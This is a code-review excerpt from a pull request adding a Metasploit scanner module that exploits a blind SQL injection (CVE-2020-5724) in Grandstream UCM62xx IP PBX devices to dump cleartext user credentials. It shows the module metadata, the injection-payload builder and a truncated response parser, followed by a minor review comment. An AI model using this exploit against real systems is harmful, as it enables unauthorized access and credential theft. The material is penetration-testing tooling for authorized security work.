modules/auxiliary/scanner/http/grandstream_ucm62xx_sql_account_guess.rb

```diff
@@ -0,0 +1,132 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Rex::Proto::Http::WebSocket
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::SQLi
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Grandstream UCM62xx IP PBX WebSocket Blind SQL Injection Credential Dump',
+        'Description' => %q{
+          This module uses a blind SQL injection (CVE-2020-5724) affecting the Grandstream UCM62xx
+          IP PBX to dump the users table. The injection occurs over a websocket at the websockify
+          endpoint, and specifically occurs when the user requests the challenge (as part of a
+          challenge and response authentication scheme). The injection is blind, but the server
+          response contains a different status code if the query was successful. As such, the
+          attacker can guess the contents of the user database. Most helpfully, the passwords are
+          stored in cleartext within the user table (CVE-2020-5723).
+
+          This issue was patched in Grandstream UCM62xx IP PBX firmware version 1.20.22.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'jbaines-r7' # Vulnerability discovery, original poc, and Metasploit module
+        ],
+        'References' => [
+          [ 'CVE', '2020-5724' ],
+          [ 'CVE', '2020-5723'],
+          [ 'URL', 'https://firmware.grandstream.com/Release_Note_UCM6xxx_1.0.20.22.pdf'],
+          [ 'URL', 'https://raw.githubusercontent.com/tenable/poc/master/grandstream/ucm62xx/dump_http_user_creds.py']
+        ],
+        'DisclosureDate' => '2020-03-30',
+        'DefaultOptions' => {
+          'RPORT' => 8089,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  # Craft the SQL injection into the challenge request
+  def create_injection_request(query)
+    id = Rex::Text.rand_text_alphanumeric(12)
+    req = "{\"type\":\"request\",\"message\":{\"transactionid\":\"#{id}\",\"version\":\"1.0\",\"action\":\"challenge\",\"username\":\""
+    req.concat("\' OR ")
+    req.concat(query)
+    req.concat('--"}}')
+    req
+  end
+
+  # Retrieve the server's response and pull out the status response. The return value is
+  # the server's response value (or 1 on failure).
+  def recv_wsframe_status(wsock)
+    res = wsock.get_wsframe
+    return 1 unless res
+
+    begin
+      res_json = JSON.parse(res.payload_data)
+    rescue JSON::ParserError
+      fail_with(Failure::UnexpectedReply, 'Failed to parse the returned JSON response. ')
```

Comment:
```suggestion
      fail_with(Failure::UnexpectedReply, 'Failed to parse the returned JSON response.')
```

Reply:
Resolved in https://github.com/rapid7/metasploit-framework/pull/16087/commits/c8f63e30cbb0f6bc75b87f1467fabdda0dbc7203